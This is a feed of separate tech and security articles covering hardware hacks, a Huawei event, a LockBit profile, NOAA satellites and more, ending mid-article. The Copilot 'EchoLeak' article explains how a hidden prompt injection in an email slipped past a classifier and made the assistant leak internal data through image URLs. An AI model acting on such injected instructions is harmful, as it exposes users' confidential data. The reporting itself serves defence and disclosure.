Despite the repeated warnings of system administrators, IT personnel, and anyone moderately aware of operational security, there are still quite a few people who will gladly plug a mysterious flash drive into their computers to see what’s on it. Devices which take advantage of this well-known behavioral vulnerability have a long history, the most famous of which is Hak5’s USB Rubber Ducky. That emulates a USB input device to rapidly execute attacker-defined commands on the target computer.

The main disadvantage of these keystroke injection attacks, from the attacker’s point of view, is that they’re not particularly subtle. It’s usually fairly obvious when something starts typing thousands of words per minute on your computer, and the victim’s next move is probably a call to IT. This is where [Krzysztof Witek]’s open-source Rubber Ducky clone has an advantage: it uses a signal detected by a SYN480R1 RF receiver to trigger the deployment of its payload. This does require the penetration tester who uses this to be on the site of the attack, but unlike with an always-on or timer-delayed Rubber Ducky, the attacker can trigger the payload when the victim is distracted or away from the computer.

This project is based around the ATmega16U2, and runs a firmware based on microdevt, a C framework for embedded development which [Krzysztof] also wrote. The project includes a custom compiler for a reduced form of Hak5’s payload programming language, so at least some of the available DuckyScript programs should be compatible with this. All of the project’s files are available on GitHub.

Perhaps due to the simplicity of the underlying concept, we’ve seen a few open source implementations of malicious input devices. One was even built into a USB cable.

hackaday.com/2025/06/13/a-remo…

Napoli, 21 maggio 2025. In un punto preciso di via Posillipo, strada che abbraccia il versante meridionale dell’omonima collina, troneggia l’elegante Villa Cilento: un’opera d’arte incastonata tra il verde, con lo sguardo rivolto al mare dove Capri e Punta Campanella sembrano volersi stringere in un azzurro abbraccio.

Proprio qui, in questo scrigno di armonia tra architettura e natura, Huawei ha scelto di ambientare la seconda tappa del suo Enterprise Roadshow 2025, un viaggio che unisce tecnologia e bellezza per lanciare la strategia “Italia Intelligente”. Dopo Roma (14 maggio) e prima di Messina (28 maggio), Napoli diventa palcoscenico di innovazione: reti ICT, cloud e soluzioni di storage dialogano con un territorio che ha fatto della sinergia tra tradizione e futuro il suo marchio.
Villa Cilento
Un evento pensato per svelare la strategia “Italia Intelligente”. Un itinerario che ha confermato la volontà del colosso cinese di intrecciare la propria spinta innovativa con le specificità e le eccellenze del tessuto imprenditoriale italiano.

La giornata è stata arricchita da una significativa tavola rotonda dal titolo “Accelerating the Intelligent Italy”, che ha visto la partecipazione di figure chiave del panorama locale e nazionale come Augusto Natale (CEO, Nabacom). Renato Massa (dirigente ASL Napoli 3 Sud), Rocco Saviano (dirigente transizione digitale, Istituto Tumori Pascale di Napoli) e Riccardo Iuzzolino (presidente, Fondazione Cultura e Innovazione).

La Discussione

Durante la discussione sono emerse testimonianze dirette dell’impatto della collaborazione tecnologica sul territorio. Augusto Natale (Nabacom), unico Gold Partner Huawei del Sud Italia, ha lodato la reattività del supporto tecnico. Supporto cruciale per un system integrator che opera a stretto contatto con il cliente finale.

Un’esperienza di vicinanza al cliente confermata da Rocco Saviano (Pascale). Saviano che ha descritto il cruciale progetto di digital pathology della Rete Oncologica Campana. Destinato a impattare 17 strutture sanitarie e reso possibile da soluzioni di storage Huawei e da una profonda collaborazione tecnica che ha incluso la personalizzazione del software per ottimizzare la gestione di pesanti immagini diagnostiche.

Renato Massa (U.O.C. Sistemi Informatici e ICT ASL Napoli 3 Sud) ha illustrato come, nonostante le sfide di un’infrastruttura sanitaria estesa (98 sedi) e risorse umane limitate, soluzioni intelligenti come iMaster NCE e il Wi-Fi 7 di Huawei stiano abilitando la modernizzazione, la semplificazione gestionale e la pianificazione di servizi innovativi per i pazienti, come il monitoraggio dei flussi interni.

La Fondazione

Riccardo Iuzzolino (Fondazione Cultura e Innovazione) ha sottolineato come la sua Fondazione apprezzi la visione di Huawei, riconoscendola come un “partner strategico di circa 170 paesi”. Con la capacità di penetrare nei territori, affiancare gli stakeholder per innovare tecnologicamente i processi educativi e quelli della trasformazione digitale nel mondo enterprise.

Inoltre, questa filosofia si traduce in progetti concreti e pluripremiati (riconosciuti dalla Presidenza del Consiglio dei Ministri e dal Ministero dell’Istruzione e del Merito):

• la “tracciabilità della filiera 4.0” applicata a eccellenze del Made in Italy come la “pizza 4.0” e la “sfogliatella 4.0” (utilizzando soluzioni IoT e blockchain);
• la creazione del “quartiere intelligente” a Piazza del Gesù a Napoli, che connette sette scuole, artigiani e imprese attraverso tecnologie Huawei.

L’impegno di Huawei: vicinanza, servizi e partnership strategiche

L’impegno di Huawei verso l’Italia, forte di ingenti investimenti globali in Ricerca e Sviluppo (circa il 20% degli utili), è stato al centro dell’intervento di Eduardo Perone, vicepresidente Huawei Europa. Perone ha menzionato le proficue collaborazioni con eccellenze campane come l’Istituto Pascale e l’Università Federico II, definite “best practice nazionali e internazionali” presentate con orgoglio in Europa.

«Veniamo a metterci la faccia», ha affermato Perone con passione, «e ci fa piacere creare questo ponte tra Shenzhen… (La Silicon Valley cinese, ndr) e Napoli… È uno dei ponti più belli del mondo!»

Questo approccio riflette la filosofia Customer First dell’azienda, mirata a una profonda comprensione e vicinanza al cliente. A rafforzare questo impegno, Domenico Mittiga, direttore Service Partner Enablement, Huawei Italia, ha illustrato la strategia dedicata al potenziamento dei partner locali.

“Huawei investe anche sui servizi”, presentando un nuovo dipartimento focalizzato sullo sviluppo delle competenze dei collaboratori italiani attraverso programmi di formazione personalizzati e certificazioni mirate. L’obiettivo è lavorare “spalla a spalla con i nostri partner” per assicurare la trasformazione digitale dei clienti “in sicurezza, efficienza e qualità”.

Tecnologie chiave per l’Italia digitale

Il portfolio tecnologico svelato a Napoli ha confermato la notevole spinta innovativa di Huawei. Per i data center sono state presentate soluzioni ad altissime prestazioni, inclusi switch fino a 100 Tbps e gli avanzati sistemi di storage All-Flash OceanStor, cruciali per carichi mission-critical e la gestione di grandi volumi di dati.

Nel campo della connettività avanzata si è spaziato da FTTO (Fiber to the Office) e DCI (Data Center Interconnect) alla premiata soluzione Wi-Fi 7 AirEngine, per reti fisse e mobili ultraveloci, affidabili e a bassa latenza.

Cuore della strategia software è l’ecosistema Xinghe Intelligent Network, potenziato dall’IA per garantire automazione intelligente, sicurezza predittiva e ottimizzazione delle performance di rete. A questo si affianca la piattaforma Datacom, per cui Huawei è stata riconosciuta “Leader nel Magic Quadrant 2024 di Gartner” per le infrastrutture LAN cablate e wireless aziendali, a testimonianza della solidità della sua offerta.

Prosegue inoltre con decisione l’impegno verso il Net5.5G, standard che integra intelligenza artificiale ed efficienza energetica, proiettando le reti verso le esigenze del prossimo futuro.

Contesto e visione per la Campania

Mentre il dibattito tecnologico globale verte su temi quali sovranità digitale e sicurezza delle infrastrutture, e Huawei ribadisce il proprio impegno per trasparenza e conformità alle normative, l’intervento di Franco Picarone, presidente della Commissione Bilancio della Regione Campania, ha ancorato la discussione alla realtà dei cittadini. Con una visione pragmatica, ha infatti affermato: «Il cittadino non chiede se un chip è cinese o americano. Chiede servizi che funzionino».

Ha illustrato progetti regionali ambiziosi:

• Tracciabilità blockchain del latte di bufala “fino al singolo animale produttore”;
• Potenziamento della medicina territoriale nelle aree interne tramite “botteghe di comunità” e soluzioni di telemedicina;
• Accessibilità universale ai siti culturali per i disabili.

Per affrontare queste sfide servono “idee chiare e partner forti sul territorio”, sottolineando come “la tecnologia è imprescindibile” in un’epoca di grandi cambiamenti.
On. Franco Picarone. Presidente della Commissione Bilancio della Regione Campania

Conclusioni: un impegno per la crescita digitale

L’Enterprise Roadshow 2025 di Huawei ha confermato la determinazione del colosso cinese nel voler essere un protagonista attivo e propositivo nella trasformazione digitale italiana, mettendo a disposizione un notevole patrimonio di innovazione e un forte orientamento alla collaborazione con le specificità locali.

Per le aziende e la pubblica amministrazione italiana si presenta l’opportunità di esplorare e implementare queste tecnologie avanzate, attraverso un’attenta valutazione che consideri performance, sostenibilità, visione futura e integrazione armonica con i propri percorsi di crescita e le esigenze dei cittadini.

Con la tappa di Messina del 28 maggio, il Huawei Italy Enterprise Roadshow 2025 ha concluso il suo viaggio attraverso la penisola. Sarà interessante osservare nei prossimi mesi come le strategie e le soluzioni presentate si concretizzeranno in nuove opportunità e progetti per il dinamico mercato ICT italiano.

La capacità di Huawei di continuare a investire, dialogare e adattarsi alle dinamiche del mercato italiano sarà fondamentale per trasformare le sfide attuali in proficue opportunità di sviluppo reciproco.

Carlo Denza

L'articolo Huawei a Napoli: l’innovazione “intelligente” incontra l’Italia, tra visione tecnologica e dinamiche globali proviene da il blog della sicurezza informatica.

Do you like Nintendo games? How about handhelds? Do you prefer the now-venerable Game Boy Advance (GBA) to more modern platforms, but wish your aging eyes could enjoy its content on a large CRT instead of a dinky LCD? If you answered yes to all those questions, you are exactly the type of person [GouldFish on Games] made this custom console for, and you should probably be friends.

The external appearance of this hack is slick: a 3D printed console with the contours of the GBA in that iconic purple, but with a cartridge bay door like an NES and a SNES controller port. It’s the GBA console Nintendo never made, sitting next to a period-appropriate CRT. Playing GBA game on a CRT with an SNES controller is already hacky; what makes it really hacky is the guts are yet another Nintendo system — the DS Lite.

Why a DS Lite? Two reasons: one, it is cheaper to get a busted DS Lite than an old GBA mainboard. Two, as we covered before, the DS Lite can do composite-out with a relatively cheap add-on board. [GouldFish] really is hacking on the shoulders of giants, and they acknowledge it in the video. Aside from the composite-out board, he also makes use of community knowledge on how to make the DS Lite boot without screens or batteries.

Should you be interested in putting your own version of this console together, [GouldFish] was kind enough to share the STLs for the 3D printed enclosure, as well as the Gerber files for the custom PCB that interfaces with the SNES controller port.

We featured a CRT mod for an original Game Boy before, but this seems a lot more practical, if a lot less portable. [GouldFish] has no shortage of old titles and newer homebrew to chose from for this console, but they could always use more. We once featured a primer on how to get into the GBA homebrew scene, if you want to make a game.

youtube.com/embed/niw_-F2xzqw?…

Thanks to [Kris] for the tip.

hackaday.com/2025/06/13/the-gb…

Attenzione: Chap ha violato Telegram? Chap è un mitomane? Chap è la Direction générale de la Sécurité extérieure? 😈

Un autore di minacce che utilizza l'alias Chap ha rivendicato la responsabilità della violazione di Telegram, affermando di aver avuto accesso sia al database di Telegram che al pannello di amministrazione.

Chap ha avvertito che se Telegram non li contatterà entro 24 ore, inizieranno a divulgare i dati esfiltrati, che presumibilmente includono numeri di telefono, indirizzi email e informazioni potenzialmente più sensibili.

Un annuncio importante sulla fuga di notizie è previsto dopo 48 ore, se non si riceverà alcuna risposta.

Questa affermazione è fondata o no? Non lo sappiamo ancora, ma continueremo a monitorare la situazione. Ulteriori aggiornamenti saranno pubblicati non appena disponibili.

https://x.com/H4ckmanac/status/1933071433694917009

@Informatica (Italy e non Italy 😁)

Nel mondo del cybercrime moderno, dove le frontiere tra criminalità e imprenditoria si fanno sempre più sfumate, il gruppo ransomware LockBit rappresenta un caso di studio affascinante.

Attivo dal 2019, LockBit è emerso come uno degli attori più pervasivi e strutturati del panorama delle minacce globali, distinguendosi per il suo modello operativo Ransomware-as-a-Service (RaaS) e per una narrazione pubblica che rivela molto più di quanto sembri. Grazie all’intervista esclusiva condotta da Red Hot Cyber e alla documentazione tecnica e comportamentale raccolta tramite la piattaforma Recorded Future, è oggi possibile tracciare una vera e propria profilazione criminologica del gruppo. Non solo sul piano tecnico, ma soprattutto su quello psicologico e organizzativo.

LockBit 3.0 si presenta al mondo con l’immagine di un’organizzazione fredda, razionale, svincolata da logiche ideologiche. Lo afferma chiaramente il loro manifesto di affiliazione: “We are completely apolitical and only interested in money.” Questa frase, all’apparenza banale, è invece un manifesto culturale. Significa che non c’è spazio per ideologie, geopolitica, religione o morale. L’unico codice che viene rispettato è quello del profitto.

La loro piattaforma di affiliazione non è solo un pannello tecnico: è un ecosistema criminale strutturato con dinamiche che ricordano i programmi di partnership delle aziende IT legittime. Ogni affiliato può accedere a un’infrastruttura completa: ransomware preconfigurati, strumenti per la cifratura di sistemi Linux, Windows, NAS, interfacce per comunicare con le vittime, timer per la pubblicazione dei dati, strumenti per l’esfiltrazione tramite Rclone o FreeFileSync, e tool per il bypass degli antivirus più diffusi. Tutto questo è documentato nei dossier pubblicati da Recorded Future, che ne analizzano in dettaglio le TTPs e l’evoluzione infrastrutturale.

Ma ciò che rende LockBit un soggetto unico non è soltanto la sua efficacia tecnica. È la psicologia che permea la sua comunicazione. Ogni riga del loro regolamento rivela una filosofia organizzativa precisa: quella di un gruppo che non tollera errori, che pretende competenza e che agisce con un controllo interno rigido. Gli affiliati devono essere noti nei forum underground, devono versare una cauzione per operare (un chiaro filtro reputazionale), e vengono sottoposti a regole di condotta severe. Chi viola queste regole – ad esempio collaborando con altri gruppi, colpendo target proibiti o disattendendo i pagamenti dovuti al gruppo madre – viene bandito e pubblicamente umiliato. Una gestione interna che ricalca, per struttura e rigore, quella di una vera multinazionale.

La selezione dei target, poi, è altrettanto rivelatrice della loro strategia. Gli attacchi sono calibrati per massimizzare il danno economico riducendo al minimo quello reputazionale. Da una parte, infatti, LockBit esclude esplicitamente obiettivi come ospedali pediatrici, cliniche oncologiche, enti religiosi o istituzioni statali russe e post-sovietiche. Dall’altra, incoraggia i propri affiliati a colpire grandi aziende occidentali, preferibilmente dotate di assicurazioni cyber. Non si tratta di una scelta morale, ma di una fredda logica di risk management: meno attenzione da parte dei media e delle agenzie di intelligence, più spazio per chiudere accordi di pagamento con le vittime.

Durante l’intervista rilasciata a Red Hot Cyber, i portavoce di LockBit hanno ribadito più volte questa distanza da qualsiasi forma di attivismo ideologico, prendendo anche le distanze da altri gruppi più politicizzati come Conti. Hanno dichiarato che il loro obiettivo non è il caos, bensì il profitto. In un passaggio, affermano perfino di essere come “pentester” che aiutano le aziende a migliorare la sicurezza. Una narrazione paradossale, ma coerente con il personaggio pubblico che si sono costruiti: criminali, ma con metodo. Hacker, ma con codice etico (selettivo).

Questa è forse la più pericolosa delle caratteristiche di LockBit: il fatto che si presentino come “affidabili”. Il loro linguaggio, la cura della piattaforma, la trasparenza apparente delle loro regole, tutto è pensato per costruire fiducia. Una fiducia tossica, certo, ma estremamente efficace. Per gli affiliati, LockBit è sinonimo di profitto e stabilità. Per le vittime, è una macchina di estorsione con cui è (tristemente) preferibile trattare, piuttosto che cercare il confronto.

In conclusione, LockBit 3.0 rappresenta la piena maturità della criminalità cyber-organizzata. Non è più solo un gruppo di hacker, ma un’azienda illegale con infrastrutture, marketing, supporto clienti e controllo qualità. Un brand, insomma. E in un mondo dove i brand ispirano fiducia, LockBit ha capito come giocare la sua partita.

Il pericolo non è solo il codice maligno che distribuisce, ma la mentalità imprenditoriale che incarna. Combatterlo richiede molto più che antivirus e patch. Serve una comprensione profonda di come oggi si struttura il crimine, a partire dalle sue logiche organizzative e psicologiche.

E serve anche il coraggio di ammettere che, in questa guerra silenziosa, il nemico non ha più il volto del teppista con l’hoodie, ma quello di un CEO in giacca e cravatta. Solo che, invece di presentazioni PowerPoint, scrive malware.

Tabella di sintesi analitica

La seguente tabella rappresenta una sintesi strutturata del profilo criminologico di LockBit 3.0, elaborata sulla base di fonti OSINT, threat intelligence e documenti originali del gruppo, inclusi regolamenti di affiliazione e comunicazioni pubbliche. Ogni categoria analizzata evidenzia specifici tratti comportamentali, organizzativi e tecnici, al fine di delineare una visione completa del gruppo sia sotto l’aspetto operativo che psicologico-criminale.

La classificazione segue un modello mutuato dall’analisi del comportamento criminale organizzato e dal framework MITRE ATT&CK, con l’integrazione di elementi qualitativi quali: livello di strutturazione interna, tono comunicativo, codici etici interni (reali o dichiarati), modelli di affiliazione, strumenti tecnici forniti, modalità di targeting e meccanismi di controllo interno.

Questa analisi consente una rapida identificazione del livello di maturità, pericolosità e prevedibilità del gruppo e può essere utilizzata come riferimento per:

• Attività di profiling per analisti CTI
• Pianificazione di difese specifiche nel SOC
• Briefing per decision maker aziendali
• Formazione in ambito cybersecurity forense e criminologia digitale

Dettagli:

PROFILO PSICO-SOCIALE DEL GRUPPO

Motivazione primaria: economica

“We are completely apolitical and only interested in money.”

LockBit si dichiara totalmente apolitico, focalizzato esclusivamente sul profitto. Questo li differenzia dai gruppi filo-governativi (es. Sandworm o Conti), posizionandoli come criminali pragmatici, non ideologici.

Etica criminale interna (selettiva)

“It is illegal to encrypt files in hospitals, clinics… oncology centers, maternity hospitals…”
“It is forbidden to attack post-Soviet countries such as Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan…”

Il gruppo dichiara di escludere target “sensibili”, per proteggere la propria reputazione nel crimine organizzato. In realtà, è una scelta opportunistica: meno attenzione delle autorità, meno rischio geopolitico, più “customer care” verso i propri affiliati.

MODELLO ORGANIZZATIVO

Schema decentralizzato tipo “franchising” criminale

• Chiunque può affiliarsi, senza limiti geografici o linguistici
• Richiesta una cauzione del 20% per operare con il pannello
• Il pannello di affiliazione è completo di funzioni: upload, chat con le vittime, decryptor testing, timer, ecc.
• Le estorsioni sono personalizzabili dall’affiliato, anche nei toni e nei metodi

“You personally communicate with the attacked companies and decide yourself how much money to take for your invaluable patient work.”

Questo evidenzia delega operativa totale, ma controllo infrastrutturale centrale.

STRUMENTAZIONE E TOOLING

Dotazione dell’affiliato:

• Ransomware preconfigurato con supporto per 14 architetture Linux
• Admin panel con funzioni integrate:
  
  • Upload file e decryptor
  • Estensione del timer per pubblicazione dati
  • Comunicazione cifrata con le vittime

  
  

• Tool di esfiltrazione: Rclone, FreeFileSync, WinSCP
• Bypass di Windows Defender e altri AV
• Supporto cifratura di storage NAS (RAID, ZFS, ext4, Btrfs)

“The fastest and most efficient encryption (without the possibility of file space error encryption).”

Si posizionano come fornitore di ransomware “premium”.

CONTROLLO, VIGILANZA E “ASSICURAZIONI”

• Sistemi reputazionali basati su forum underground
• Obbligo di non collaborare con altri gruppi ransomware: “Do not work with competitors”
• Possibilità di espulsione o punizione in caso di furti, truffe o comportamento scorretto
• Inserimento in “blacklist” se si violano le regole

“Be understanding with such a careful attitude to your candidacy, because you personally would not be very pleased if your newly encrypted company were decrypted for free.”

In altre parole: “o giochi secondo le regole, o roviniamo la tua reputazione”.

SELEZIONE DEI TARGET

Vietato colpire:

• Sanità (solo in casi estremi e chirurgicamente selezionati)
• Enti religiosi
• ONG
• Enti governativi ex-URSS

Preferiti:

• Aziende occidentali
• Aziende con elevato flusso finanziario
• Compagnie assicurate (con ransom coverage)
• Infrastrutture private critiche

L'articolo Dentro la mente di LockBit: profilazione criminologica di un gruppo ransomware “aziendale” proviene da il blog della sicurezza informatica.

Microsoft 365 Copilot è uno strumento di intelligenza artificiale integrato in applicazioni Office come Word, Excel, Outlook, PowerPoint e Teams. I ricercatori hanno recentemente scoperto che lo strumento presenta una grave vulnerabilità di sicurezza, rivelando i rischi più ampi che gli agenti di intelligenza artificiale possono comportare in caso di attacchi informatici.

La startup di sicurezza AI Aim Security ha scoperto e divulgato la vulnerabilità, che ha definito il primo attacco “zero-click” noto contro un agente AI. Un agente AI è un sistema AI in grado di completare un obiettivo specifico in modo autonomo. Grazie alla natura specifica della vulnerabilità, gli aggressori possono accedere a informazioni sensibili presenti in applicazioni e fonti dati connesse all’agente AI senza che gli utenti debbano fare clic o interagire con tali informazioni.

Nel caso di Microsoft 365 Copilot, agli aggressori è bastato inviare un’e-mail all’utente per lanciare l’attacco, senza ricorrere a tattiche di phishing o malware. La catena di attacco ha utilizzato una serie di accorgimenti tecnici ingegnosi per guidare l’assistente AI ad “attaccare se stesso”.

Un’e-mail ruba dati AI sensibili dalle aziende

Microsoft 365 Copilot può eseguire attività basate sulle istruzioni dell’utente nelle applicazioni di Office, come l’accesso a documenti o la generazione di suggerimenti. Una volta sfruttato dagli hacker, lo strumento può essere utilizzato per accedere a informazioni interne sensibili come email, fogli di calcolo e registri di chat. Tali attacchi aggirano i meccanismi di protezione integrati di Copilot, il che può portare alla fuga di dati proprietari, riservati o relativi alla conformità.

Figura: Diagramma della catena di attacco

L’attacco è iniziato con un’e-mail dannosa inviata all’utente preso di mira, il cui contenuto non aveva nulla a che fare con Copilot ed era camuffato da normale documento aziendale. Nell’email era incorporato un prompt injection nascosto, che ordinava al modello di grandi dimensioni di estrarre e divulgare dati interni sensibili. Poiché il testo di questi prompt sembrava normale contenuto scritto a esseri umani, il sistema ha aggirato con successo il classificatore Microsoft per la protezione dagli attacchi Cross-Prompt Injection (XPIA).

Successivamente, quando un utente pone a Copilot una domanda di carattere lavorativo, l’e-mail viene incorporata nel contesto di un prompt nel modello più ampio dal motore RAG (Retrieval Augmentation Generation) grazie al suo formato e alla sua apparente pertinenza. Una volta all’interno del modello, le iniezioni dannose possono “ingannare” il modello inducendolo a estrarre dati interni sensibili e a inserirli in link o immagini realizzati con cura.

Aim Security ha scoperto che alcuni formati di immagine Markdown fanno sì che il browser avvii una richiesta di immagine e invii automaticamente i dati incorporati nell’URL al server dell’aggressore. I criteri di sicurezza dei contenuti (CSP) di Microsoft bloccano l’accesso dalla maggior parte dei domini esterni, ma gli URL di Microsoft Teams e SharePoint sono considerati fonti attendibili e possono quindi essere sfruttati in modo improprio dagli aggressori per esfiltrare facilmente dati.

Figura: Effetto attacco

Le vulnerabilità espongono difetti fondamentali negli agenti di intelligenza artificiale

Il team di ricerca di Aim Security ha chiamato la vulnerabilità “EchoLeak“. Microsoft ha risposto di aver risolto il problema in Copilot e che attualmente nessun cliente è interessato. “Ringraziamo Aim per aver scoperto e segnalato responsabilmente questo problema, consentendoci di risolverlo prima che i clienti ne fossero colpiti”, ha dichiarato un portavoce di Microsoft in una nota. “Abbiamo aggiornato i nostri prodotti per mitigare la vulnerabilità e non è richiesta alcuna azione da parte dei clienti. Abbiamo inoltre implementato ulteriori misure di difesa approfondita per rafforzare ulteriormente il nostro livello di sicurezza.”

I ricercatori di Aim sottolineano che EchoLeak non è solo una comune vulnerabilità di sicurezza. Il suo impatto va oltre Copilot e rivela una falla fondamentale nella progettazione di agenti di intelligenza artificiale di grandi dimensioni. Questo è simile alle vulnerabilità software degli anni ’90. A quel tempo, gli aggressori iniziarono a sfruttare queste vulnerabilità per controllare dispositivi come laptop e telefoni cellulari.

Adir Gruss, co-fondatore e CTO di Aim Security, ha affermato che lui e il suo team di ricerca hanno trascorso circa tre mesi a effettuare il reverse engineering di Microsoft 365 Copilot, un assistente AI generativo ampiamente utilizzato, nella speranza di identificare rischi simili a precedenti vulnerabilità software e di sviluppare meccanismi di protezione.

Gruss ha spiegato di aver contattato immediatamente il Microsoft Security Response Center, responsabile delle indagini su tutti i problemi di sicurezza che riguardano i prodotti e i servizi Microsoft, dopo aver scoperto la vulnerabilità a gennaio. Ha affermato: “Prendono davvero sul serio la sicurezza dei loro clienti. Ci hanno detto che questa scoperta è rivoluzionaria per loro”.

Tuttavia, Microsoft ha impiegato cinque mesi per risolvere finalmente il problema. Gruss ha affermato: “Per un problema di questo livello, si tratta di un ciclo di risoluzione molto lungo”. Ha sottolineato che uno dei motivi è che la vulnerabilità è molto recente e Microsoft ha bisogno di tempo per mobilitare il team giusto, comprendere il problema e sviluppare un piano di mitigazione.

L'articolo Più le AI diventano come noi, più soffriranno di Social Engineering? Il caso di Copilot che preoccupa proviene da il blog della sicurezza informatica.

What do you do when you’re a starving student and you need a 400 MHz logic analyzer for your digital circuit investigations? As [nanofix] shows in a recent video, you find one that’s available as an open hardware project and build it yourself.

The project, aptly named LogicAnalyzer was developed by [Dr. Gusman] a few years back, and has actually graced these pages in the past. In the video below, [nanofix] concentrates on the mechanics of actually putting the board together with a focus on soldering. The back of the build is the Raspberry Pi Pico 2 and the TXU0104 level shifters.

If you’d like to follow along at home, all the build instructions and design files are available on GitHub. For your convenience the Gerber files have been shared at PCBWay

Of course we have heaps of material here at Hackaday covering logic analyzers. If you’re interested in budget options check out $13 Scope And Logic Analyzer Hits 18 Msps or how to build one using a ZX Spectrum! If you’re just getting started with logic analyzers (or if you’re not sure why you should) check out Logic Analyzers: Tapping Into Raspberry Pi Secrets.

youtube.com/embed/NaSM0-yAvQs?…

hackaday.com/2025/06/12/build-…

[Bhuvanmakes] says that he has the simplest open source photobioreactor. Is it? Since it is the only photobioreactor we are aware of, we’ll assume that it is. According to the post, other designs are either difficult to recreate since they require PC boards, sensors, and significant coding.

This project uses no microcontroller, so it has no coding. It also has no sensors. The device is essentially an acrylic tube with an air pump and some LEDs.

The base is 3D printed and contains very limited electronics. In addition to the normal construction, apparently, the cylinder has to be very clean before you introduce the bioreactant.

Of course, you also need something to bioreact, if that’s even a real word. The biomass of choice in this case was Scenedesmus algae. While photobioreactors are used in commercial settings where you need to grow something that requires light, like algae, this one appears to mostly be for decorative purposes. Sort of an aquarium for algae. Then again, maybe someone has some use for this. If that’s you, let us know what your plans are in the comments.

We’ve seen a lantern repurposed into a bioreactor. It doesn’t really have the photo part, but we’ve seen a homebrew bioreactor for making penicillin.

youtube.com/embed/He-LUacT_SY?…

hackaday.com/2025/06/12/simple…

They’re marketed as “Solar Generators” or “Solar Power Stations” but what they are is a nice box with a battery, charge controller, and inverter inside. [DoItYourselfDad] on Youtube decided that since all of those parts are available separately, he could put one together himself.

The project is a nice simple job for a weekend afternoon. (He claims 2 hours.) Because it’s all COTS components, it just a matter of wiring everything together, and sticking into a box. [DoItYourselfDad] walks his viewers through this process very clearly, including installing a shunt to monitor the battery. (This is the kind of video you could send to your brother-in-law in good conscience.)

Strictly speaking, he didn’t need the shunt, since his fancy LiFePo pack from TimeUSB has one built in with Bluetooth connectivity. Having a dedicated screen is nice, though, as is the ability to charge from wall power or solar, via the two different charge controllers [DoItYourselfDad] includes. If it were our power station, we’d be sure to put in a DC-DC converter for USB-PD functionality, but his use case must be different as he has a 120 V inverter as the only output. That’s the nice thing about doing it yourself, though: you can include all the features you want, and none that you don’t.

We’re not totally sure about his claim that the clear cargo box was chosen because he was inspired by late-90s Macintosh computers, but it’s a perfectly usable case, and the build quality is probably as good as the cheapest options on TEMU.

This project is simple, but it does the job. Have you made a more sophisticated battery box, or other more-impressive project? Don’t cast shade on [DoItYourselfDad]: cast light on your work by letting us know about it!.

youtube.com/embed/g_v6E-MYMdc?…

hackaday.com/2025/06/12/cots-c…

What’s the GitHub repository you have created that you think is of most note? Which one do you think of as your magnum opus, the one that you will be remembered by? Was it the CAD files and schematics of a device for ending world hunger, or perhaps it was software designed to end poverty? Spare a thought for [AasishPokhrel] then, for his latest repository is one that he’ll be remembered by for all the wrong reasons. The poor guy created a repository with a scatalogical name, no doubt to store random things, but had the misfortune to inadvertently create the billionth repository on GitHub.

At the time of writing, the repository sadly contains no commits. But he seems to have won an unexpectedly valuable piece of Internet real estate judging by the attention it’s received, and if we were him we’d be scrambling to fill it with whatever wisdom we wanted the world to see. A peek at his other repos suggests he’s busy learning JavaScript, and we wish him luck in that endeavor.

We think everyone will at some time or another have let loose some code into the wild perhaps with a comment they later regret, or a silly name that later comes back to haunt them. We know we have. So enjoy a giggle at his expense, but don’t give him a hard time. After all, this much entertainment should be rewarded.

hackaday.com/2025/06/12/the-bi…

This Pet Hacks Contest entry from [Andrea] opens the door to a great collaboration of sensors to solve a problem. The Cat At The Door project’s name is a bit of a giveaway to its purpose, but this project has something for everyone, from radar to e-ink, LoRa to 3D printing. He wanted a sensor to watch the door his cats frequent and when one of his cats were detected have an alert sent to where he is in the house

There are several ways you can detect a cat, in this project [Andrea] went with mmWave radar, and this is ideal for sensing a cat as it allows the sensor to sit protected inside, it works day or night, and it doesn’t stop working should the cat stand still. In his project log he has a chapter going into what he did to dial in the settings on the LD2410C radar board.

How do you know if you’re detecting your cat, some other cat, a large squirrel, or a small child? It helps if you first give your cats a MAC address, in the form of a BLE tag. Once the radar detects presence of a suspected cat, the ESP32-S3 starts looking over Bluetooth, and if a known tag is found it will identify which cat or cats are outside waiting.

Once the known cat has been identified, it’s time to notify [Andrea] that his cat is waiting for his door opening abilities. To do this he selected an ESP32 board that includes a SX1262 LoRa module for communicating with the portable notification device. This battery powered device has a low power e-paper display showing you which cat, as well as an audio buzzer to help alert you.

To read more details about this project head over to the GitHub page to check out all the details. Including a very impressive 80 page step-by-step guide showing you step by step how to make your own. Also, be sure to check out the other entries into the 2025 Pet Hacks Contest.

youtube.com/embed/0kiuHv76AjQ?…

hackaday.com/2025/06/12/2025-p…

Since October 1978, the National Oceanic and Atmospheric Administration (NOAA) has operated its fleet of Polar-orbiting Operational Environmental Satellites (POES) — the data from which has been used for a wide array of environmental monitoring applications, from weather forecasting to the detection of forest fires and volcanic eruptions. But technology marches on, and considering that even the youngest member of the fleet has been in orbit for 16 years, NOAA has decided to retire the remaining operational POES satellites on June 16th.
NOAA Polar-orbiting Operational Environmental Satellite (POES)
Under normal circumstances, the retirement of weather satellites wouldn’t have a great impact on our community. But in this case, the satellites in question utilize the Automatic Picture Transmission (APT), Low-Rate Picture Transmission (LRPT), and High Resolution Picture Transmission (HRPT) protocols, all of which can be received by affordable software defined radios (SDRs) such as the RTL-SDR and easily decoded using free and open source software.

As such, many a radio hobbyist has pointed their DIY antennas at these particular satellites and pulled down stunning pictures of the Earth. It’s the kind of thing that’s impressive enough to get new folks interested in experimenting with radio, and losing it would be a big blow to the hobby.

Luckily, it’s not all bad news. While one of the NOAA satellites slated for retirement is already down for good, at least two remaining birds should be broadcasting publicly accessible imagery for the foreseeable future.

Not For Operational Use

The story starts in January, when NOAA announced that it would soon stop actively maintaining the three remaining operational POES satellites: NOAA-15, NOAA-18, and NOAA-19. At the time, the agency said there were currently no plans to decommission the spacecraft, and that anything they transmitted back down to Earth should be considered “data of opportunity” rather than a reliable source of information.

However, things appeared to have changed by April when NOAA sent out an update with what seemed like conflicting information. The update said that delivery of all data from the satellites would be terminated on June 16th, and that any users should switch over to other sources. Taken at face value, this certainly sounded like the end of amateurs being able to receive images from these particular satellites.

This was enough of a concern for radio hobbyists that Carl Reinemann, who operates the SDR-focused website USRadioguy.com, reached out to NOAA’s Office of Satellite and Product Operations for clarification. It was explained that the intent of the notice was to inform the public that NOAA would no longer be using or disseminating any of the data collected by the POES satellites, not that they would stop transmitting data entirely.

